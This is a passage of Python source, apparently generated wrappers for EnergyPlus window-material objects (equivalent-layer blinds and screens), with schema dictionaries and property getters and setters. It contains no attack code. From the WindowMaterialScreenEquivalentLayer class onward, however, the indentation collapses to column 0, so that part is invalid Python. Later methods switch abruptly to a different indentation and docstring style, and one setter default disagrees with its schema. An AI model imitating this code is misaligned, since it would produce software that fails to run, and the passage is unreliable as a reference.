                                      (u'front side slat diffuse-diffuse solar reflectance',
                                       {'name': u'Front Side Slat Diffuse-Diffuse Solar Reflectance',
                                        'pyname': u'front_side_slat_diffusediffuse_solar_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'back side slat diffuse-diffuse solar reflectance',
                                       {'name': u'Back Side Slat Diffuse-Diffuse Solar Reflectance',
                                        'pyname': u'back_side_slat_diffusediffuse_solar_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'slat diffuse-diffuse visible transmittance',
                                       {'name': u'Slat Diffuse-Diffuse Visible Transmittance',
                                        'pyname': u'slat_diffusediffuse_visible_transmittance',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'front side slat diffuse-diffuse visible reflectance',
                                       {'name': u'Front Side Slat Diffuse-Diffuse Visible Reflectance',
                                        'pyname': u'front_side_slat_diffusediffuse_visible_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'back side slat diffuse-diffuse visible reflectance',
                                       {'name': u'Back Side Slat Diffuse-Diffuse Visible Reflectance',
                                        'pyname': u'back_side_slat_diffusediffuse_visible_reflectance',
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'slat infrared transmittance',
                                       {'name': u'Slat Infrared Transmittance',
                                        'pyname': u'slat_infrared_transmittance',
                                        'default': 0.0,
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'front side slat infrared emissivity',
                                       {'name': u'Front Side Slat Infrared Emissivity',
                                        'pyname': u'front_side_slat_infrared_emissivity',
                                        'default': 0.9,
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'back side slat infrared emissivity',
                                       {'name': u'Back Side Slat Infrared Emissivity',
                                        'pyname': u'back_side_slat_infrared_emissivity',
                                        'default': 0.9,
                                        'maximum<': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'slat angle control',
                                       {'name': u'Slat Angle Control',
                                        'pyname': u'slat_angle_control',
                                        'default': u'FixedSlatAngle',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'FixedSlatAngle',
                                                            u'MaximizeSolar',
                                                            u'BlockBeamSolar'],
                                        'autocalculatable': False,
                                        'type': 'alpha'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 10,
               'name': u'WindowMaterial:Blind:EquivalentLayer',
               'pyname': u'WindowMaterialBlindEquivalentLayer',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def slat_orientation(self):
        """field `Slat Orientation`

        |  Default value: Horizontal

        Args:
            value (str): value for IDD Field `Slat Orientation`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `slat_orientation` or None if not set

        """
        return self["Slat Orientation"]

    @slat_orientation.setter
    def slat_orientation(self, value="Horizontal"):
        """Corresponds to IDD field `Slat Orientation`"""
        self["Slat Orientation"] = value

    @property
    def slat_width(self):
        """field `Slat Width`

        |  Units: m
        |  IP-Units: in
        |  value <= 0.025

        Args:
            value (float): value for IDD Field `Slat Width`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `slat_width` or None if not set

        """
        return self["Slat Width"]

    @slat_width.setter
    def slat_width(self, value=None):
        """Corresponds to IDD field `Slat Width`"""
        self["Slat Width"] = value

    @property
    def slat_separation(self):
        """field `Slat Separation`

        |  Distance between adjacent slat faces
        |  Units: m
        |  IP-Units: in
        |  value <= 0.025

        Args:
            value (float): value for IDD Field `Slat Separation`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `slat_separation` or None if not set

        """
        return self["Slat Separation"]

    @slat_separation.setter
    def slat_separation(self, value=None):
        """Corresponds to IDD field `Slat Separation`"""
        self["Slat Separation"] = value

    @property
    def slat_crown(self):
        """field `Slat Crown`

        |  Perpendicular length between the cord and the curve.
        |  Slat is assumed to be rectangular in cross section
        |  and flat. Crown=0.0625x"Slat width"
        |  Units: m
        |  IP-Units: in
        |  Default value: 0.0015
        |  value <= 0.00156

        Args:
            value (float): value for IDD Field `Slat Crown`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `slat_crown` or None if not set

        """
        return self["Slat Crown"]

    @slat_crown.setter
    def slat_crown(self, value=0.0015):
        """Corresponds to IDD field `Slat Crown`"""
        self["Slat Crown"] = value

    @property
    def slat_angle(self):
        """field `Slat Angle`

        |  Units: deg
        |  Default value: 45.0
        |  value <= 180.0

        Args:
            value (float): value for IDD Field `Slat Angle`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `slat_angle` or None if not set

        """
        return self["Slat Angle"]

    @slat_angle.setter
    def slat_angle(self, value=45.0):
        """Corresponds to IDD field `Slat Angle`"""
        self["Slat Angle"] = value

    @property
    def front_side_slat_beamdiffuse_solar_transmittance(self):
        """field `Front Side Slat Beam-Diffuse Solar Transmittance`

        |  The front side beam-diffuse solar transmittance of the slat at normal
        |  incidence averaged over the entire spectrum of solar radiation.
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Slat Beam-Diffuse Solar Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_slat_beamdiffuse_solar_transmittance` or None if not set

        """
        return self["Front Side Slat Beam-Diffuse Solar Transmittance"]

    @front_side_slat_beamdiffuse_solar_transmittance.setter
    def front_side_slat_beamdiffuse_solar_transmittance(self, value=None):
        """ Corresponds to IDD field `Front Side Slat Beam-Diffuse Solar Transmittance`
        """
        self["Front Side Slat Beam-Diffuse Solar Transmittance"] = value

    @property
    def back_side_slat_beamdiffuse_solar_transmittance(self):
        """field `Back Side Slat Beam-Diffuse Solar Transmittance`

        |  The back side beam-diffuse solar transmittance of the slat at normal
        |  incidence averaged over the entire spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Slat Beam-Diffuse Solar Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_slat_beamdiffuse_solar_transmittance` or None if not set

        """
        return self["Back Side Slat Beam-Diffuse Solar Transmittance"]

    @back_side_slat_beamdiffuse_solar_transmittance.setter
    def back_side_slat_beamdiffuse_solar_transmittance(self, value=None):
        """ Corresponds to IDD field `Back Side Slat Beam-Diffuse Solar Transmittance`
        """
        self["Back Side Slat Beam-Diffuse Solar Transmittance"] = value

    @property
    def front_side_slat_beamdiffuse_solar_reflectance(self):
        """field `Front Side Slat Beam-Diffuse Solar Reflectance`

        |  The front side beam-diffuse solar reflectance of the slat at normal
        |  incidence averaged over the entire spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Slat Beam-Diffuse Solar Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_slat_beamdiffuse_solar_reflectance` or None if not set

        """
        return self["Front Side Slat Beam-Diffuse Solar Reflectance"]

    @front_side_slat_beamdiffuse_solar_reflectance.setter
    def front_side_slat_beamdiffuse_solar_reflectance(self, value=None):
        """ Corresponds to IDD field `Front Side Slat Beam-Diffuse Solar Reflectance`
        """
        self["Front Side Slat Beam-Diffuse Solar Reflectance"] = value

    @property
    def back_side_slat_beamdiffuse_solar_reflectance(self):
        """field `Back Side Slat Beam-Diffuse Solar Reflectance`

        |  The back side beam-diffuse solar reflectance of the slat at normal
        |  incidence averaged over the entire spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Slat Beam-Diffuse Solar Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_slat_beamdiffuse_solar_reflectance` or None if not set

        """
        return self["Back Side Slat Beam-Diffuse Solar Reflectance"]

    @back_side_slat_beamdiffuse_solar_reflectance.setter
    def back_side_slat_beamdiffuse_solar_reflectance(self, value=None):
        """ Corresponds to IDD field `Back Side Slat Beam-Diffuse Solar Reflectance`
        """
        self["Back Side Slat Beam-Diffuse Solar Reflectance"] = value

    @property
    def front_side_slat_beamdiffuse_visible_transmittance(self):
        """field `Front Side Slat Beam-Diffuse Visible Transmittance`

        |  The front side beam-diffuse visible transmittance of the slat
        |  at normal incidence averaged over the visible spectrum range
        |  of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Slat Beam-Diffuse Visible Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_slat_beamdiffuse_visible_transmittance` or None if not set

        """
        return self["Front Side Slat Beam-Diffuse Visible Transmittance"]

    @front_side_slat_beamdiffuse_visible_transmittance.setter
    def front_side_slat_beamdiffuse_visible_transmittance(self, value=None):
        """ Corresponds to IDD field `Front Side Slat Beam-Diffuse Visible Transmittance`
        """
        self["Front Side Slat Beam-Diffuse Visible Transmittance"] = value

    @property
    def back_side_slat_beamdiffuse_visible_transmittance(self):
        """field `Back Side Slat Beam-Diffuse Visible Transmittance`

        |  The back side beam-diffuse visible transmittance of the slat
        |  at normal incidence averaged over the visible spectrum range
        |  of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Slat Beam-Diffuse Visible Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_slat_beamdiffuse_visible_transmittance` or None if not set

        """
        return self["Back Side Slat Beam-Diffuse Visible Transmittance"]

    @back_side_slat_beamdiffuse_visible_transmittance.setter
    def back_side_slat_beamdiffuse_visible_transmittance(self, value=None):
        """ Corresponds to IDD field `Back Side Slat Beam-Diffuse Visible Transmittance`
        """
        self["Back Side Slat Beam-Diffuse Visible Transmittance"] = value

    @property
    def front_side_slat_beamdiffuse_visible_reflectance(self):
        """field `Front Side Slat Beam-Diffuse Visible Reflectance`

        |  The front side beam-diffuse visible reflectance of the slat
        |  at normal incidence averaged over the visible spectrum range
        |  of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Slat Beam-Diffuse Visible Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_slat_beamdiffuse_visible_reflectance` or None if not set

        """
        return self["Front Side Slat Beam-Diffuse Visible Reflectance"]

    @front_side_slat_beamdiffuse_visible_reflectance.setter
    def front_side_slat_beamdiffuse_visible_reflectance(self, value=None):
        """ Corresponds to IDD field `Front Side Slat Beam-Diffuse Visible Reflectance`
        """
        self["Front Side Slat Beam-Diffuse Visible Reflectance"] = value

    @property
    def back_side_slat_beamdiffuse_visible_reflectance(self):
        """field `Back Side Slat Beam-Diffuse Visible Reflectance`

        |  The back side beam-diffuse visible reflectance of the slat
        |  at normal incidence averaged over the visible spectrum range
        |  of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Slat Beam-Diffuse Visible Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_slat_beamdiffuse_visible_reflectance` or None if not set

        """
        return self["Back Side Slat Beam-Diffuse Visible Reflectance"]

    @back_side_slat_beamdiffuse_visible_reflectance.setter
    def back_side_slat_beamdiffuse_visible_reflectance(self, value=None):
        """ Corresponds to IDD field `Back Side Slat Beam-Diffuse Visible Reflectance`
        """
        self["Back Side Slat Beam-Diffuse Visible Reflectance"] = value

    @property
    def slat_diffusediffuse_solar_transmittance(self):
        """field `Slat Diffuse-Diffuse Solar Transmittance`

        |  The diffuse-diffuse solar transmittance of the slat averaged
        |  over the entire solar spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Slat Diffuse-Diffuse Solar Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `slat_diffusediffuse_solar_transmittance` or None if not set

        """
        return self["Slat Diffuse-Diffuse Solar Transmittance"]

    @slat_diffusediffuse_solar_transmittance.setter
    def slat_diffusediffuse_solar_transmittance(self, value=None):
        """ Corresponds to IDD field `Slat Diffuse-Diffuse Solar Transmittance`
        """
        self["Slat Diffuse-Diffuse Solar Transmittance"] = value

    @property
    def front_side_slat_diffusediffuse_solar_reflectance(self):
        """field `Front Side Slat Diffuse-Diffuse Solar Reflectance`

        |  The front side diffuse-diffuse solar reflectance of the slat
        |  averaged over the entire solar spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Slat Diffuse-Diffuse Solar Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_slat_diffusediffuse_solar_reflectance` or None if not set

        """
        return self["Front Side Slat Diffuse-Diffuse Solar Reflectance"]

    @front_side_slat_diffusediffuse_solar_reflectance.setter
    def front_side_slat_diffusediffuse_solar_reflectance(self, value=None):
        """ Corresponds to IDD field `Front Side Slat Diffuse-Diffuse Solar Reflectance`
        """
        self["Front Side Slat Diffuse-Diffuse Solar Reflectance"] = value

    @property
    def back_side_slat_diffusediffuse_solar_reflectance(self):
        """field `Back Side Slat Diffuse-Diffuse Solar Reflectance`

        |  The back side diffuse-diffuse solar reflectance of the slat
        |  averaged over the entire solar spectrum of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Slat Diffuse-Diffuse Solar Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_slat_diffusediffuse_solar_reflectance` or None if not set

        """
        return self["Back Side Slat Diffuse-Diffuse Solar Reflectance"]

    @back_side_slat_diffusediffuse_solar_reflectance.setter
    def back_side_slat_diffusediffuse_solar_reflectance(self, value=None):
        """ Corresponds to IDD field `Back Side Slat Diffuse-Diffuse Solar Reflectance`
        """
        self["Back Side Slat Diffuse-Diffuse Solar Reflectance"] = value

    @property
    def slat_diffusediffuse_visible_transmittance(self):
        """field `Slat Diffuse-Diffuse Visible Transmittance`

        |  The diffuse-diffuse visible transmittance of the slat averaged
        |  over the visible spectrum range of solar radiation.
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Slat Diffuse-Diffuse Visible Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `slat_diffusediffuse_visible_transmittance` or None if not set

        """
        return self["Slat Diffuse-Diffuse Visible Transmittance"]

    @slat_diffusediffuse_visible_transmittance.setter
    def slat_diffusediffuse_visible_transmittance(self, value=None):
        """ Corresponds to IDD field `Slat Diffuse-Diffuse Visible Transmittance`
        """
        self["Slat Diffuse-Diffuse Visible Transmittance"] = value

    @property
    def front_side_slat_diffusediffuse_visible_reflectance(self):
        """field `Front Side Slat Diffuse-Diffuse Visible Reflectance`

        |  The front side diffuse-diffuse visible reflectance of the slat
        |  averaged over the visible spectrum range of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Slat Diffuse-Diffuse Visible Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_slat_diffusediffuse_visible_reflectance` or None if not set

        """
        return self["Front Side Slat Diffuse-Diffuse Visible Reflectance"]

    @front_side_slat_diffusediffuse_visible_reflectance.setter
    def front_side_slat_diffusediffuse_visible_reflectance(self, value=None):
        """ Corresponds to IDD field `Front Side Slat Diffuse-Diffuse Visible Reflectance`
        """
        self["Front Side Slat Diffuse-Diffuse Visible Reflectance"] = value

    @property
    def back_side_slat_diffusediffuse_visible_reflectance(self):
        """field `Back Side Slat Diffuse-Diffuse Visible Reflectance`

        |  The back side diffuse-diffuse visible reflectance of the slat
        |  averaged over the visible spectrum range of solar radiation.
        |  Units: dimensionless
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Slat Diffuse-Diffuse Visible Reflectance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_slat_diffusediffuse_visible_reflectance` or None if not set

        """
        return self["Back Side Slat Diffuse-Diffuse Visible Reflectance"]

    @back_side_slat_diffusediffuse_visible_reflectance.setter
    def back_side_slat_diffusediffuse_visible_reflectance(self, value=None):
        """ Corresponds to IDD field `Back Side Slat Diffuse-Diffuse Visible Reflectance`
        """
        self["Back Side Slat Diffuse-Diffuse Visible Reflectance"] = value

    @property
    def slat_infrared_transmittance(self):
        """field `Slat Infrared Transmittance`

        |  Long-wave hemispherical transmittance of the slat material.
        |  Assumed to be the same for both sides of the slat.
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Slat Infrared Transmittance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `slat_infrared_transmittance` or None if not set

        """
        return self["Slat Infrared Transmittance"]

    @slat_infrared_transmittance.setter
    def slat_infrared_transmittance(self, value=None):
        """Corresponds to IDD field `Slat Infrared Transmittance`"""
        self["Slat Infrared Transmittance"] = value

    @property
    def front_side_slat_infrared_emissivity(self):
        """field `Front Side Slat Infrared Emissivity`

        |  Front side long-wave hemispherical emissivity of the slat material.
        |  Units: dimensionless
        |  Default value: 0.9
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Front Side Slat Infrared Emissivity`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `front_side_slat_infrared_emissivity` or None if not set

        """
        return self["Front Side Slat Infrared Emissivity"]

    @front_side_slat_infrared_emissivity.setter
    def front_side_slat_infrared_emissivity(self, value=0.9):
        """Corresponds to IDD field `Front Side Slat Infrared Emissivity`"""
        self["Front Side Slat Infrared Emissivity"] = value

    @property
    def back_side_slat_infrared_emissivity(self):
        """field `Back Side Slat Infrared Emissivity`

        |  Back side long-wave hemispherical emissivity of the slat material.
        |  Units: dimensionless
        |  Default value: 0.9
        |  value < 1.0

        Args:
            value (float): value for IDD Field `Back Side Slat Infrared Emissivity`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `back_side_slat_infrared_emissivity` or None if not set

        """
        return self["Back Side Slat Infrared Emissivity"]

    @back_side_slat_infrared_emissivity.setter
    def back_side_slat_infrared_emissivity(self, value=0.9):
        """Corresponds to IDD field `Back Side Slat Infrared Emissivity`"""
        self["Back Side Slat Infrared Emissivity"] = value

    @property
    def slat_angle_control(self):
        """field `Slat Angle Control`

        |  Used only if slat angle control is desired to either maximize solar
        |  gain (MaximizeSolar), maximize visibility while eliminating beam solar
        |  radiation (BlockBeamSolar), or fixed slat angle (FixedSlatAngle).
        |  If FixedSlatAngle is selected, the slat angle entered above is used.
        |  Default value: FixedSlatAngle

        Args:
            value (str): value for IDD Field `Slat Angle Control`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `slat_angle_control` or None if not set

        """
        return self["Slat Angle Control"]

    @slat_angle_control.setter
    def slat_angle_control(self, value="FixedSlatAngle"):
        """Corresponds to IDD field `Slat Angle Control`"""
        self["Slat Angle Control"] = value
class WindowMaterialScreenEquivalentLayer(DataObject):
""" Corresponds to IDD object `WindowMaterial:Screen:EquivalentLayer`
Equivalent layer window screen physical properties. Can only be
located on the exterior side of a window construction.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'screen beam-beam solar transmittance',
{'name': u'Screen Beam-Beam Solar Transmittance',
'pyname': u'screen_beambeam_solar_transmittance',
'default': 'autocalculate',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen beam-diffuse solar transmittance',
{'name': u'Screen Beam-Diffuse Solar Transmittance',
'pyname': u'screen_beamdiffuse_solar_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen beam-diffuse solar reflectance',
{'name': u'Screen Beam-Diffuse Solar Reflectance',
'pyname': u'screen_beamdiffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen beam-beam visible transmittance',
{'name': u'Screen Beam-Beam Visible Transmittance',
'pyname': u'screen_beambeam_visible_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen beam-diffuse visible transmittance',
{'name': u'Screen Beam-Diffuse Visible Transmittance',
'pyname': u'screen_beamdiffuse_visible_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen beam-diffuse visible reflectance',
{'name': u'Screen Beam-Diffuse Visible Reflectance',
'pyname': u'screen_beamdiffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen infrared transmittance',
{'name': u'Screen Infrared Transmittance',
'pyname': u'screen_infrared_transmittance',
'default': 0.02,
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen infrared emissivity',
{'name': u'Screen Infrared Emissivity',
'pyname': u'screen_infrared_emissivity',
'default': 0.93,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'}),
(u'screen wire spacing',
{'name': u'Screen Wire Spacing',
'pyname': u'screen_wire_spacing',
'default': 0.025,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'screen wire diameter',
{'name': u'Screen Wire Diameter',
'pyname': u'screen_wire_diameter',
'default': 0.005,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 4,
'name': u'WindowMaterial:Screen:EquivalentLayer',
'pyname': u'WindowMaterialScreenEquivalentLayer',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Enter a unique name for this window screen material.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def screen_beambeam_solar_transmittance(self):
"""field `Screen Beam-Beam Solar Transmittance`
| The beam-beam transmittance of the screen material at normal incidence.
| This input field is the same as the material openness area fraction
| and can be autocalculated from the wire spacing and wire and diameter.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| Default value: "autocalculate"
| value < 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Screen Beam-Beam Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `screen_beambeam_solar_transmittance` or None if not set
"""
return self["Screen Beam-Beam Solar Transmittance"]
@screen_beambeam_solar_transmittance.setter
def screen_beambeam_solar_transmittance(self, value="autocalculate"):
""" Corresponds to IDD field `Screen Beam-Beam Solar Transmittance`
"""
self["Screen Beam-Beam Solar Transmittance"] = value
@property
def screen_beamdiffuse_solar_transmittance(self):
"""field `Screen Beam-Diffuse Solar Transmittance`
| The beam-diffuse solar transmittance of the screen material at normal
| incidence averaged over the entire spectrum of solar radiation.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Screen Beam-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `screen_beamdiffuse_solar_transmittance` or None if not set
"""
return self["Screen Beam-Diffuse Solar Transmittance"]
@screen_beamdiffuse_solar_transmittance.setter
def screen_beamdiffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Screen Beam-Diffuse Solar Transmittance`
"""
self["Screen Beam-Diffuse Solar Transmittance"] = value
@property
def screen_beamdiffuse_solar_reflectance(self):
    """Get or set IDD field `Screen Beam-Diffuse Solar Reflectance`.

    Beam-diffuse solar reflectance of the screen material at normal
    incidence, averaged over the entire solar spectrum; assumed identical
    for both sides of the screen. Dimensionless; value < 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Screen Beam-Diffuse Solar Reflectance"]

@screen_beamdiffuse_solar_reflectance.setter
def screen_beamdiffuse_solar_reflectance(self, value=None):
    """Assign IDD field `Screen Beam-Diffuse Solar Reflectance`."""
    self["Screen Beam-Diffuse Solar Reflectance"] = value
@property
def screen_beambeam_visible_transmittance(self):
    """Get or set IDD field `Screen Beam-Beam Visible Transmittance`.

    Beam-beam visible transmittance of the screen material at normal
    incidence, averaged over the visible spectrum range of solar
    radiation; assumed identical for both sides of the screen.
    Dimensionless; value < 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Screen Beam-Beam Visible Transmittance"]

@screen_beambeam_visible_transmittance.setter
def screen_beambeam_visible_transmittance(self, value=None):
    """Assign IDD field `Screen Beam-Beam Visible Transmittance`."""
    self["Screen Beam-Beam Visible Transmittance"] = value
@property
def screen_beamdiffuse_visible_transmittance(self):
    """Get or set IDD field `Screen Beam-Diffuse Visible Transmittance`.

    Beam-diffuse visible transmittance of the screen material at normal
    incidence, averaged over the visible spectrum range of solar
    radiation; assumed identical for both sides of the screen.
    Dimensionless; value < 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Screen Beam-Diffuse Visible Transmittance"]

@screen_beamdiffuse_visible_transmittance.setter
def screen_beamdiffuse_visible_transmittance(self, value=None):
    """Assign IDD field `Screen Beam-Diffuse Visible Transmittance`."""
    self["Screen Beam-Diffuse Visible Transmittance"] = value
@property
def screen_beamdiffuse_visible_reflectance(self):
    """Get or set IDD field `Screen Beam-Diffuse Visible Reflectance`.

    Beam-diffuse visible reflectance of the screen material at normal
    incidence, averaged over the visible spectrum range of solar
    radiation; assumed identical for both sides of the screen.
    Dimensionless; value < 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Screen Beam-Diffuse Visible Reflectance"]

@screen_beamdiffuse_visible_reflectance.setter
def screen_beamdiffuse_visible_reflectance(self, value=None):
    """Assign IDD field `Screen Beam-Diffuse Visible Reflectance`."""
    self["Screen Beam-Diffuse Visible Reflectance"] = value
@property
def screen_infrared_transmittance(self):
    """Get or set IDD field `Screen Infrared Transmittance`.

    Long-wave hemispherical transmittance of the screen material; assumed
    identical for both sides of the screen. Dimensionless; value < 1.0.
    Default: 0.02.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Screen Infrared Transmittance"]

@screen_infrared_transmittance.setter
def screen_infrared_transmittance(self, value=0.02):
    """Assign IDD field `Screen Infrared Transmittance` (default 0.02)."""
    self["Screen Infrared Transmittance"] = value
@property
def screen_infrared_emissivity(self):
    """Get or set IDD field `Screen Infrared Emissivity`.

    Long-wave hemispherical emissivity of the screen material; assumed
    identical for both sides of the screen. Dimensionless; value < 1.0.
    Default: 0.93.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Screen Infrared Emissivity"]

@screen_infrared_emissivity.setter
def screen_infrared_emissivity(self, value=0.93):
    """Assign IDD field `Screen Infrared Emissivity` (default 0.93)."""
    self["Screen Infrared Emissivity"] = value
@property
def screen_wire_spacing(self):
    """Get or set IDD field `Screen Wire Spacing`.

    Wire spacing, assumed the same in both directions.
    Units: m (IP: in). Default: 0.025.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Screen Wire Spacing"]

@screen_wire_spacing.setter
def screen_wire_spacing(self, value=0.025):
    """Assign IDD field `Screen Wire Spacing` (default 0.025 m)."""
    self["Screen Wire Spacing"] = value
@property
def screen_wire_diameter(self):
    """Get or set IDD field `Screen Wire Diameter`.

    Wire diameter, assumed the same in both directions.
    Units: m (IP: in). Default: 0.005.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Screen Wire Diameter"]

@screen_wire_diameter.setter
def screen_wire_diameter(self, value=0.005):
    """Assign IDD field `Screen Wire Diameter` (default 0.005 m)."""
    self["Screen Wire Diameter"] = value
